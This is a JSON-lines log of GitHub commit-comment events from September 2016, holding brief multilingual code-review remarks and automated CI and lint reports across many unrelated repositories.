{"id":"4576109281","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19059725,"position":null,"line":null,"path":null,"commit_id":"674c653772a10e774e8925f60191e04eaf6419ab","created_at":"2016-09-16T20:09:45Z","updated_at":"2016-09-16T20:09:45Z","body":"folder .sass-cache nie powinien znaleźć się na repozytorrium\r\nto samo pliki .css oraz .map.css - ponieważ są generowane z pliku sass\r\n\r\nzatem wystarczy mieć sass, aby móc je odtworzyć "}},"created_at":"2016-09-16T20:09:45Z"}
{"id":"4576109580","type":"CommitCommentEvent","actor":{"login":"jandersson"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":19059729,"position":null,"line":null,"path":null,"commit_id":"6e0adbe457487aba2afd7e50454cdb5742fe0413","created_at":"2016-09-16T20:09:50Z","updated_at":"2016-09-16T20:09:50Z","body":"Thanks!"}},"created_at":"2016-09-16T20:09:50Z"}
{"id":"4576114260","type":"CommitCommentEvent","actor":{"login":"doublemarked"},"repo":{"name":"strongloop/loopback.io"},"payload":{"comment":{"id":19059748,"position":null,"line":null,"path":null,"commit_id":"68694f6c5300351fe0cd381d9be40b4bb1a4da5b","created_at":"2016-09-16T20:10:51Z","updated_at":"2016-09-16T20:10:51Z","body":"All good now :)"}},"created_at":"2016-09-16T20:10:51Z"}
{"id":"4576118827","type":"CommitCommentEvent","actor":{"login":"ManuelRauber"},"repo":{"name":"thinktecture/boardz-cross-platform-sample"},"payload":{"comment":{"id":19059763,"position":3,"line":1,"path":".nvmrc","commit_id":"5386e6d339587fc51deb0932653231a72e1d48a6","created_at":"2016-09-16T20:11:53Z","updated_at":"2016-09-16T20:11:53Z","body":"Or just use `6` to use whatever version 6 is installed on the machine. :)"}},"created_at":"2016-09-16T20:11:53Z"}
{"id":"4576119044","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19059765,"position":8,"line":15,"path":"crytographic_primitives.md","commit_id":"20d2b855caf71277288f47d2098d84e65e194962","created_at":"2016-09-16T20:11:57Z","updated_at":"2016-09-16T20:11:57Z","body":"Yes, we need to choose one of them."}},"created_at":"2016-09-16T20:11:57Z"}
{"id":"4576124608","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19059780,"position":10,"line":11,"path":"app/core/Controller.php","commit_id":"98ed79004d542d400128472c4097ad1b82ebce75","created_at":"2016-09-16T20:13:13Z","updated_at":"2016-09-16T20:13:13Z","body":"Нам не нужно знать пути до имен класса. Согласно`psr-4` путь до искомого класса выдирается из его `namespace`\r\n\r\nПочитай тут http://www.php-fig.org/psr/psr-4/\r\n\r\n> This PSR describes a specification for autoloading classes from file paths. It is fully interoperable, and can be used in addition to any other autoloading specification, including PSR-0. This PSR also describes where to place files that will be autoloaded according to the specification."}},"created_at":"2016-09-16T20:13:13Z"}
{"id":"4576126979","type":"CommitCommentEvent","actor":{"login":"pitosalas"},"repo":{"name":"pitosalas/gitdemo2"},"payload":{"comment":{"id":19059790,"position":null,"line":null,"path":null,"commit_id":"e063948c67f1131956a325ce7a5243e468ec20dd","created_at":"2016-09-16T20:13:45Z","updated_at":"2016-09-16T20:13:45Z","body":"Aqwaomw xommir laksjdkalsjh k"}},"created_at":"2016-09-16T20:13:45Z"}
{"id":"4576128179","type":"CommitCommentEvent","actor":{"login":"pitosalas"},"repo":{"name":"pitosalas/gitdemo2"},"payload":{"comment":{"id":19059794,"position":3,"line":3,"path":"opensesame.rb","commit_id":"e063948c67f1131956a325ce7a5243e468ec20dd","created_at":"2016-09-16T20:14:03Z","updated_at":"2016-09-16T20:14:03Z","body":"This line is a bug, Ian, what are you doing???\r\n"}},"created_at":"2016-09-16T20:14:03Z"}
{"id":"4576130481","type":"CommitCommentEvent","actor":{"login":"ndavalos"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19059798,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T20:14:34Z","updated_at":"2016-09-16T20:14:34Z","body":"Terrain in Taviana is very problematic, just like Namalsk."}},"created_at":"2016-09-16T20:14:34Z"}
{"id":"4576130704","type":"CommitCommentEvent","actor":{"login":"PierreR"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19059800,"position":null,"line":null,"path":null,"commit_id":"68f43cf9a9c7189a938fbff7f4debf811c28c891","created_at":"2016-09-16T20:14:36Z","updated_at":"2016-09-16T20:14:36Z","body":"I have tried a PR:  https://github.com/NixOS/nixpkgs/pull/18675\r\n\r\nHope it is ok."}},"created_at":"2016-09-16T20:14:36Z"}
{"id":"4576132992","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/website"},"payload":{"comment":{"id":19059804,"position":null,"line":null,"path":null,"commit_id":"fd12d351c73696ef03f384a7cc81545a0bac3dc2","created_at":"2016-09-16T20:15:09Z","updated_at":"2016-09-16T20:15:09Z","body":"Yes I can, it is Great! Thanks :)\n\nDiego Rabatone Oliveira\n"}},"created_at":"2016-09-16T20:15:09Z"}
{"id":"4576134469","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19059810,"position":8,"line":15,"path":"crytographic_primitives.md","commit_id":"20d2b855caf71277288f47d2098d84e65e194962","created_at":"2016-09-16T20:15:29Z","updated_at":"2016-09-16T20:15:29Z","body":"We have not make a decision yet so this is why both of them are here. "}},"created_at":"2016-09-16T20:15:29Z"}
{"id":"4576137104","type":"CommitCommentEvent","actor":{"login":"wigy-opensource-developer"},"repo":{"name":"Fermat-ORG/rust-home-node"},"payload":{"comment":{"id":19059818,"position":null,"line":null,"path":null,"commit_id":"8807be0757646228aef113159bc2040e59ffa82c","created_at":"2016-09-16T20:16:04Z","updated_at":"2016-09-16T20:16:04Z","body":"If you know run `./run.sh` in one terminal, then `telnet localhost 3000` in another one, you should get something like this:\r\n```\r\nINFO:iop_home_d: Binding port 0.0.0.0:3000\r\nINFO:iop_home_d: Accepting connection on 0.0.0.0:3000\r\nDEBUG:iop_home_d: Connection from V4(127.0.0.1:54506)\r\n```\r\nAwesome, heh?"}},"created_at":"2016-09-16T20:16:04Z"}
{"id":"4576141338","type":"CommitCommentEvent","actor":{"login":"signalw"},"repo":{"name":"pitosalas/gitdemo2"},"payload":{"comment":{"id":19059829,"position":null,"line":null,"path":null,"commit_id":"e063948c67f1131956a325ce7a5243e468ec20dd","created_at":"2016-09-16T20:17:00Z","updated_at":"2016-09-16T20:17:00Z","body":"jalsjflkdsakdsf"}},"created_at":"2016-09-16T20:17:00Z"}
{"id":"4576146628","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/CSE"},"payload":{"comment":{"id":19059846,"position":null,"line":null,"path":null,"commit_id":"57a50bb0c77194bcd2b99f38df650fd71b057bf3","created_at":"2016-09-16T20:18:08Z","updated_at":"2016-09-16T20:18:08Z","body":"THAT'S WORSE...\r\n(And I need to stop revealing my personal life to people)"}},"created_at":"2016-09-16T20:18:08Z"}
{"id":"4576152213","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19059863,"position":null,"line":null,"path":null,"commit_id":"a5eb62f105512b0bf1d25598b0137c0574d86db1","created_at":"2016-09-16T20:19:21Z","updated_at":"2016-09-16T20:19:21Z","body":"Did you change anything other than adding a comment?"}},"created_at":"2016-09-16T20:19:21Z"}
{"id":"4576155304","type":"CommitCommentEvent","actor":{"login":"sirDonovan"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19059867,"position":51,"line":162,"path":"chat-plugins/info.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-16T20:20:00Z","updated_at":"2016-09-16T20:20:00Z","body":"There's no check here that <code>muted</code> is a userid so every user appears to be muted (as undefined) in all rooms they are in."}},"created_at":"2016-09-16T20:20:00Z"}
{"id":"4576161777","type":"CommitCommentEvent","actor":{"login":"bdejong"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19059873,"position":46,"line":46,"path":"utils/downloads.py","commit_id":"de139e17b766b2e5059c0143cb0ede77581589e9","created_at":"2016-09-16T20:21:19Z","updated_at":"2016-09-16T20:21:19Z","body":"Instead of forking out to the command line I would use zlib in this case as these files are very small:\r\n\r\n```\r\nimport zlib\r\nhex(zlib.crc32(b'hello-world')) & 0xffffffff\r\n```\r\n\r\nShould normally give the same result. But best compare with the command line..."}},"created_at":"2016-09-16T20:21:19Z"}
{"id":"4576162214","type":"CommitCommentEvent","actor":{"login":"grobie"},"repo":{"name":"grandbora/prometheus"},"payload":{"comment":{"id":19059874,"position":6,"line":312,"path":"web/web.go","commit_id":"802a0a61727e9c8ebad13842b776865fd42ba443","created_at":"2016-09-16T20:21:25Z","updated_at":"2016-09-16T20:21:25Z","body":"Fragments are not sent to servers. You'll need to do the redirect in js."}},"created_at":"2016-09-16T20:21:25Z"}
{"id":"4576164143","type":"CommitCommentEvent","actor":{"login":"Daniel15"},"repo":{"name":"douglascrockford/JSLint"},"payload":{"comment":{"id":19059882,"position":null,"line":null,"path":null,"commit_id":"185661488c2d805eddd99685fa39f8291e6a1187","created_at":"2016-09-16T20:21:48Z","updated_at":"2016-09-16T20:21:48Z","body":"Why is it called `the_fart`?"}},"created_at":"2016-09-16T20:21:48Z"}
{"id":"4576165587","type":"CommitCommentEvent","actor":{"login":"agentlame"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":19059889,"position":null,"line":null,"path":null,"commit_id":"5d7a4a6906f631dadfafd21e3bdad7b57f0d0a1e","created_at":"2016-09-16T20:22:08Z","updated_at":"2016-09-16T20:22:08Z","body":"No!"}},"created_at":"2016-09-16T20:22:08Z"}
{"id":"4576168356","type":"CommitCommentEvent","actor":{"login":"creesch"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":19059890,"position":null,"line":null,"path":null,"commit_id":"5d7a4a6906f631dadfafd21e3bdad7b57f0d0a1e","created_at":"2016-09-16T20:22:45Z","updated_at":"2016-09-16T20:22:45Z","body":"No? What is the proper way to reset a setting? "}},"created_at":"2016-09-16T20:22:45Z"}
{"id":"4576169470","type":"CommitCommentEvent","actor":{"login":"agentlame"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":19059892,"position":null,"line":null,"path":null,"commit_id":"5d7a4a6906f631dadfafd21e3bdad7b57f0d0a1e","created_at":"2016-09-16T20:22:57Z","updated_at":"2016-09-16T20:22:57Z","body":"https://github.com/creesch/reddit-moderator-toolbox/blob/master/extension/data/tbutils.js#L223"}},"created_at":"2016-09-16T20:22:57Z"}
{"id":"4576170068","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19059894,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-16T20:23:03Z","updated_at":"2016-09-16T20:23:03Z","body":"Yes, not existing yet in kernel tree that we use"}},"created_at":"2016-09-16T20:23:03Z"}
{"id":"4576170537","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19059897,"position":null,"line":null,"path":null,"commit_id":"76a782f0bf4727bb7f7e99125a93d386887f6ac9","created_at":"2016-09-16T20:23:09Z","updated_at":"2016-09-16T20:23:09Z","body":"@loechel Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/49/violations\n```\nplone/namedfile/file.py:5:1: F401 'StringIO' imported but unused\nplone/namedfile/scaling.py:173:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\nplone/namedfile/utils/__init__.py:9:1: F401 'FileUpload' imported but unused\nplone/namedfile/utils/__init__.py:141:13: E265 block comment should start with '# '\nplone/namedfile/utils/__init__.py:159:29: F841 local variable 'e' is assigned to but never used\nplone/namedfile/utils/__init__.py:171:1: C901 'rotate_image' is too complex (17)\nplone/namedfile/utils/__init__.py:233:5: B901 blind except: statement\nplone/namedfile/utils/jpeg_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/png_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/png_utils.py:4:1: F401 'StringIO' imported but unused\nplone/namedfile/utils/tiff_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/tiff_utils.py:34:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:37:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:40:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:72:1: C901 '_translate_field_type' is too complex (13)\nplone/namedfile/utils/tiff_utils.py:97:80: E501 line too long (89 > 79 characters)\nplone/namedfile/utils/tiff_utils.py:99:80: E501 line too long (88 > 79 characters)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-16T20:23:09Z"}
{"id":"4576171467","type":"CommitCommentEvent","actor":{"login":"mrjbq7"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":19059900,"position":null,"line":null,"path":null,"commit_id":"96610a47a8bcf087b9aa12686b1c46199b34153b","created_at":"2016-09-16T20:23:21Z","updated_at":"2016-09-16T20:23:21Z","body":"One thing this was useful for is deploying an image that does nothing and exits for testing performance, but I agree it's just as easy to write ``./factor -e=\"\"`` as ``./factor -run=none``."}},"created_at":"2016-09-16T20:23:21Z"}
{"id":"4576172040","type":"CommitCommentEvent","actor":{"login":"creesch"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":19059902,"position":null,"line":null,"path":null,"commit_id":"5d7a4a6906f631dadfafd21e3bdad7b57f0d0a1e","created_at":"2016-09-16T20:23:28Z","updated_at":"2016-09-16T20:23:28Z","body":"ty bb"}},"created_at":"2016-09-16T20:23:28Z"}
{"id":"4576173935","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"echin6/dsp"},"payload":{"comment":{"id":19059909,"position":null,"line":null,"path":null,"commit_id":"73e9a483d3cd321fe1f8919f3554debb24073c99","created_at":"2016-09-16T20:23:52Z","updated_at":"2016-09-16T20:23:52Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @echin6 \r\n\r\nNice work on Python! Here are some comments:\r\n- Can you give an example of a list comprehension that substitutes for reduce()?\r\n- String functions (Q6) and list functions (Q7): you need to remove the `raise NotImplementedError` at the end of each routine, or else make it do something useful.\r\n- Function `donuts`: there is unnecessary indentation at line 7.\r\n- Function `both_ends`: unnecessary indentation at line 32.\r\n- Function `both_ends`: you can replace `s[s_len-2:s_len]` by `s[-2:]`.\r\n- Converting strings to lists is not the most efficient way to manipulate strings. For example, the function `mix_up(a,b)` is most easily implemented by `return b[:2]+a[2:]+' '+a[:2]+b[2:]`.\r\n- Function `not_bad` does not seem to be working on the examples given...\r\n- I like your implementation of function `front_x(words)`!\r\n- General comment about defining functions: end them with `return s` rather than `print s` (for example).\r\n- Function `linear_merge`: here you are just sorting the combined list, which takes an amount of time of order `n*log(n)` instead of order `n`, where `n` is the list length. Try to make use of the fact that the given lists `list1` and `list2` are already sorted to begin with.\r\n- For the parsing problem (Q8), remember to close a file that you opened with `f = open('football.csv')`. Or else use the construct `with open('football.csv', 'r') as f:`. In the latter case Python will close the file for you.\r\n\r\n👍 "}},"created_at":"2016-09-16T20:23:52Z"}
{"id":"4576174667","type":"CommitCommentEvent","actor":{"login":"agentlame"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":19059912,"position":null,"line":null,"path":null,"commit_id":"5d7a4a6906f631dadfafd21e3bdad7b57f0d0a1e","created_at":"2016-09-16T20:24:02Z","updated_at":"2016-09-16T20:24:02Z","body":"Examples of using it in the past: https://github.com/creesch/reddit-moderator-toolbox/blob/3.3.1/extension/data/tbutils.js#L213"}},"created_at":"2016-09-16T20:24:02Z"}
{"id":"4576177273","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19059920,"position":null,"line":null,"path":null,"commit_id":"263a9efd9bdb6421badcba2517d1052b3a4d025b","created_at":"2016-09-16T20:24:36Z","updated_at":"2016-09-16T20:24:36Z","body":"Although we're not talking about search here, have you ever tried to increase LMR with piece shuffling?\r\nSomething like: `r += pos.rule50_count() * ONE_PLY / 8;`\r\n(I believe it would be better with fractional LMR...)"}},"created_at":"2016-09-16T20:24:36Z"}
{"id":"4576178561","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"ChaiScript/ChaiScript"},"payload":{"comment":{"id":19059922,"position":null,"line":null,"path":null,"commit_id":"3b2c82ba2c37d1b398bb92d53ed5f266d8f51666","created_at":"2016-09-16T20:24:52Z","updated_at":"2016-09-16T20:24:52Z","body":" contrib/codeanalysis/runcppcheck.sh: line 9: ../cppcheck-1.66/cppcheck: No such file or directory\n"}},"created_at":"2016-09-16T20:24:52Z"}
{"id":"4576181120","type":"CommitCommentEvent","actor":{"login":"grahamu"},"repo":{"name":"pinax/pinax-api"},"payload":{"comment":{"id":19059929,"position":null,"line":null,"path":null,"commit_id":"8f2e1ef30a62c19fc91eed48adc38ecfcdbc37d6","created_at":"2016-09-16T20:25:23Z","updated_at":"2016-09-16T20:25:23Z","body":"@brosner This fails with\r\n\r\n```\r\nbuiltins.TypeError: can't set attributes of built-in/extension type 'dict'\r\n```\r\n\r\nwhen resource model is a Python builtin, i.e. a dict."}},"created_at":"2016-09-16T20:25:23Z"}
{"id":"4576185652","type":"CommitCommentEvent","actor":{"login":"mibuntu"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19059941,"position":null,"line":null,"path":null,"commit_id":"ffe5c49c3ebb51d534a339e0d85a0aa7967923dc","created_at":"2016-09-16T20:26:18Z","updated_at":"2016-09-16T20:26:18Z","body":":white_check_mark:   :+1: "}},"created_at":"2016-09-16T20:26:18Z"}
{"id":"4576188519","type":"CommitCommentEvent","actor":{"login":"grandbora"},"repo":{"name":"grandbora/prometheus"},"payload":{"comment":{"id":19059953,"position":6,"line":312,"path":"web/web.go","commit_id":"802a0a61727e9c8ebad13842b776865fd42ba443","created_at":"2016-09-16T20:26:55Z","updated_at":"2016-09-16T20:26:55Z","body":"OH NO :(\r\n![](http://i.giphy.com/Za3FFB6aXVAnS.gif)"}},"created_at":"2016-09-16T20:26:55Z"}
{"id":"4576189036","type":"CommitCommentEvent","actor":{"login":"KenjiTakahashi"},"repo":{"name":"gokcehan/lf"},"payload":{"comment":{"id":19059954,"position":6,"line":357,"path":"ui.go","commit_id":"d51e99adc16c375dacea6f5c07d9bfcdfcfd4b0f","created_at":"2016-09-16T20:27:01Z","updated_at":"2016-09-16T20:27:01Z","body":"It will wait for the command to complete, but it will not wait for you to finish reading from the pipe. If `Wait` is called from different goroutine and command finishes before you drain the pipe, you've got a race condition. The docs explicitly say not to call `Wait` before all reads are done: https://golang.org/pkg/os/exec/#Cmd.StdoutPipe.\r\n\r\nWithout the goroutine, calling `Wait` will actually make the whole process synchronous. Try putting `sleep 10` or sth in the previewer script and it will hang the ui.\r\nThe direction I described above works fine."}},"created_at":"2016-09-16T20:27:01Z"}
{"id":"4576194216","type":"CommitCommentEvent","actor":{"login":"grobie"},"repo":{"name":"grandbora/prometheus"},"payload":{"comment":{"id":19059969,"position":6,"line":312,"path":"web/web.go","commit_id":"802a0a61727e9c8ebad13842b776865fd42ba443","created_at":"2016-09-16T20:28:10Z","updated_at":"2016-09-16T20:28:10Z","body":"I'm sorry for not having been more explicit.\n\nOn Fri, Sep 16, 2016, 16:26 Bora Tunca <notifications@github.com> wrote:\n\n> OH NO :(\n>\n> <https://camo.githubusercontent.com/96971159aa6c07f8efbfb1e5f725b37988842ddb/687474703a2f2f692e67697068792e636f6d2f5a613346464236615856416e532e676966>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/grandbora/prometheus/commit/802a0a61727e9c8ebad13842b776865fd42ba443#commitcomment-19059953>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAANaPi7DNDw7vKgzkaASPV8SpwXd1Koks5qqvuPgaJpZM4J_S2u>\n> .\n>\n"}},"created_at":"2016-09-16T20:28:10Z"}
{"id":"4576205573","type":"CommitCommentEvent","actor":{"login":"timothyryanwalsh"},"repo":{"name":"timothyryanwalsh/cca-tools"},"payload":{"comment":{"id":19060006,"position":null,"line":null,"path":null,"commit_id":"efe614903ae136a257cfdd07260451277e818fde","created_at":"2016-09-16T20:30:40Z","updated_at":"2016-09-16T20:30:40Z","body":"Sub function for hurry.filesize"}},"created_at":"2016-09-16T20:30:40Z"}
{"id":"4576209584","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"TeslaRom-N/packages_apps_Settings"},"payload":{"comment":{"id":19060015,"position":null,"line":null,"path":null,"commit_id":"18441f77ea550f50bc456837dd704ef5081ffd35","created_at":"2016-09-16T20:31:33Z","updated_at":"2016-09-16T20:31:33Z","body":"thanks Pete :-)"}},"created_at":"2016-09-16T20:31:33Z"}
{"id":"4576211713","type":"CommitCommentEvent","actor":{"login":"sirDonovan"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19060018,"position":703,"line":799,"path":"punishments.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-16T20:32:02Z","updated_at":"2016-09-16T20:32:02Z","body":"<code>Punishments.checkRoomBanned()</code> is still used in <code>/mute</code> and <code>/hidetext</code>."}},"created_at":"2016-09-16T20:32:02Z"}
{"id":"4576215726","type":"CommitCommentEvent","actor":{"login":"knakashima"},"repo":{"name":"knakashima/alexa-meraki"},"payload":{"comment":{"id":19060027,"position":null,"line":null,"path":null,"commit_id":"a4d9fb732026b9b6ee63038e23f11e326f869557","created_at":"2016-09-16T20:32:55Z","updated_at":"2016-09-16T20:32:55Z","body":"AWS Lambda function Python deployment packag"}},"created_at":"2016-09-16T20:32:55Z"}
{"id":"4576219556","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19060039,"position":null,"line":null,"path":null,"commit_id":"96d11e026fee0618a3c7fa1ce65ba0e3b6486876","created_at":"2016-09-16T20:33:46Z","updated_at":"2016-09-16T20:33:46Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-unstable.95](http://build.prxm.it:8813/viewLog.html?buildId=3661&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 250 Build time: 00:01:38"}},"created_at":"2016-09-16T20:33:46Z"}
{"id":"4576220408","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19060041,"position":6,"line":6,"path":"config/init.php","commit_id":"7d3cfdea154321185b455218f3f14cefd54d3750","created_at":"2016-09-16T20:33:58Z","updated_at":"2016-09-16T20:33:58Z","body":"все свои require - убирай. Они нам не нужны будут. "}},"created_at":"2016-09-16T20:33:58Z"}
{"id":"4576222528","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":19060044,"position":null,"line":null,"path":null,"commit_id":"e67c0b2ebf988bf4c9c004ef6d15b212cf998d9a","created_at":"2016-09-16T20:34:26Z","updated_at":"2016-09-16T20:34:26Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;te3WuwDO&#x2F;26-passer-la-transformation-avant-import-en-mode-jbj-inject\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Passer la transformation avant import  en mode JBJ.inject</a>"}},"created_at":"2016-09-16T20:34:26Z"}
{"id":"4576225252","type":"CommitCommentEvent","actor":{"login":"Darcidride"},"repo":{"name":"MinetestForFun/server-minetestforfun-skyblock"},"payload":{"comment":{"id":19060052,"position":null,"line":null,"path":null,"commit_id":"350909620328c66c768f746f73b99a139db0213a","created_at":"2016-09-16T20:35:02Z","updated_at":"2016-09-16T20:35:02Z","body":"Perfect in my point of view, good work @LeMagnesium !"}},"created_at":"2016-09-16T20:35:02Z"}
{"id":"4576226990","type":"CommitCommentEvent","actor":{"login":"iameli"},"repo":{"name":"edwinmah/pirate-bartender"},"payload":{"comment":{"id":19060056,"position":241,"line":146,"path":"js/app.js","commit_id":"6c22143fafb634910f048eb0a779c6bf8fdb542e","created_at":"2016-09-16T20:35:27Z","updated_at":"2016-09-16T20:35:27Z","body":"Good but unnecessary use of terinary operators. The `===` compares two things and passes back a boolean, so this line could just be \r\n\r\n```\r\nvar prefVal     = userReponse === 'yes'\r\n```"}},"created_at":"2016-09-16T20:35:27Z"}
{"id":"4576227255","type":"CommitCommentEvent","actor":{"login":"twiest"},"repo":{"name":"rhdedgar/openshift-tools"},"payload":{"comment":{"id":19060059,"position":1,"line":1,"path":"openshift_tools/change_iam_password.py","commit_id":"7387847b281d4ac4256db7993971bc56d0cf75bc","created_at":"2016-09-16T20:35:30Z","updated_at":"2016-09-16T20:35:30Z","body":"openshift_tools is meant for libraries. Please move this somewhere under /scripts "}},"created_at":"2016-09-16T20:35:30Z"}
{"id":"4576228933","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19060063,"position":18,"line":15,"path":"views/dashboard/index.php","commit_id":"7d3cfdea154321185b455218f3f14cefd54d3750","created_at":"2016-09-16T20:35:52Z","updated_at":"2016-09-16T20:35:52Z","body":"я понимаю что удобно использовать короткие тэги в пхп `<? ?>` но, забудь про них, это очень вредная привычка. Во многих сборках пхп, по умолчанию `short_tags` отключены. Если ты не хочешь иметь вечный геморрой со своей писаниной, то используй стандартные тэги `<?php ?> <?php echo ?>`"}},"created_at":"2016-09-16T20:35:52Z"}
{"id":"4576236057","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19060086,"position":null,"line":null,"path":null,"commit_id":"19e57cfa1c7b0e15c2a9ae1d94d3b241e920e106","created_at":"2016-09-16T20:37:26Z","updated_at":"2016-09-16T20:37:26Z","body":"pregledao nema greske\r\nti si zvijezda ove ekipe"}},"created_at":"2016-09-16T20:37:26Z"}
{"id":"4576237578","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19060092,"position":null,"line":null,"path":null,"commit_id":"7d17bb175f86617e7bd57fd49f4bc53c58425b11","created_at":"2016-09-16T20:37:47Z","updated_at":"2016-09-16T20:37:47Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.79](http://build.prxm.it:8813/viewLog.html?buildId=3662&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 76; runner failure (new) Build time: 00:03:18\n### Failed tests\n```\nxUnit.net v1 Tests for C:\\agents\\nes\\work\\623237454e7de2b5\\src\\NEventStore.Persistence.MongoDB.Tests\\bin\\Release\\NEventStore.Persistence.MongoDB.Tests.dll (1): when adding a commit after a snapshot, it should find the stream in the set of streams to be sn: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-16T20:37:47Z"}
{"id":"4576237582","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19060093,"position":null,"line":null,"path":null,"commit_id":"7d17bb175f86617e7bd57fd49f4bc53c58425b11","created_at":"2016-09-16T20:37:47Z","updated_at":"2016-09-16T20:37:47Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.79](http://build.prxm.it:8813/viewLog.html?buildId=3662&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 76; runner failure (new) Build time: 00:03:18\n### Failed tests\n```\nxUnit.net v1 Tests for C:\\agents\\nes\\work\\623237454e7de2b5\\src\\NEventStore.Persistence.MongoDB.Tests\\bin\\Release\\NEventStore.Persistence.MongoDB.Tests.dll (1): when adding a commit after a snapshot, it should find the stream in the set of streams to be sn: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-16T20:37:47Z"}
{"id":"4576244400","type":"CommitCommentEvent","actor":{"login":"twiest"},"repo":{"name":"rhdedgar/openshift-tools"},"payload":{"comment":{"id":19060106,"position":105,"line":105,"path":"openshift_tools/change_iam_password.py","commit_id":"7387847b281d4ac4256db7993971bc56d0cf75bc","created_at":"2016-09-16T20:39:18Z","updated_at":"2016-09-16T20:39:18Z","body":"Why are you parsing the args with argparser and then not using hte results here?"}},"created_at":"2016-09-16T20:39:18Z"}
{"id":"4576245401","type":"CommitCommentEvent","actor":{"login":"kasparsklavins"},"repo":{"name":"Quill88/bigint"},"payload":{"comment":{"id":19060109,"position":null,"line":null,"path":null,"commit_id":"5e8e18d62bc4ffb0c18476d126cdba73971a2c60","created_at":"2016-09-16T20:39:31Z","updated_at":"2016-09-16T20:39:31Z","body":"Do you have a failing case?"}},"created_at":"2016-09-16T20:39:31Z"}
